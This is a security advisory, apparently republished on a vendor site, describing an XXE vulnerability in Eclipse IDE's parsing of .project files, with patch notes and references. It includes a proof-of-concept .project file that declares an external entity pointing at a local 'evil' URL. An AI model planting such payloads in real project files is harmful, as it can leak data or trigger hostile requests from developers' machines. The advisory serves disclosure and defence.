CVE

GHSA-j24h-xcpc-9jw8

Eclipse IDE XXE in eclipse.platform

CVE

GHSA-j24h-xcpc-9jw8

Eclipse IDE XXE in eclipse.platform

Impact

xml files like ".project" are parsed vulnerable against all sorts of XXE attacks. The user just needs to open any evil project or update an open project with a vulnerable file (for example for review a foreign repository or patch).

Vulnerablility was found by static code analysis (SonarLint).

Example .project file:

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE price [
<!ENTITY xxe SYSTEM "http://127.0.0.1:49416/evil">]>
<projectDescription>
	<name>p</name>
	<comment>&xxe;</comment>
</projectDescription>

Patches

Similar patches including junit test that shows the vulnerability have already applied to PDE (see https://github.com/eclipse-pde/eclipse.pde/pull/667). A solution to platform should be the same: just reject parsing any XML that contains any DOCTYPE.

Workarounds

No known workaround. User can only avoid to get/open any foreign files with eclipse. Firewall rules against loss of data (but not against XML bomb).

References

https://cwe.mitre.org/data/definitions/611.html

https://rules.sonarsource.com/java/RSPEC-2755

https://gitlab.eclipse.org/security/vulnerability-reports/-/issues/8 (Report for multiple projects affected)

Package Versions Affected

No items found.

Automatically patch vulnerabilities without upgrading

Fix Without Upgrading

Detect compatible fix

Apply safe remediation

Fix with a single pull request

CVSS Version

Related Resources

No items found.

References

Severity

5

CVSS Score

Basic Information

Ecosystem

Base CVSS

EPSS Probability

0.00026%

EPSS Percentile

0.06612%

Introduced Version

3.1.1

Fix Available

Fix Critical Vulnerabilities Instantly

Secure your app without upgrading.

Fix Without Upgrading

Get a Demo

Let's Patch It!

GHSA-j24h-xcpc-9jw8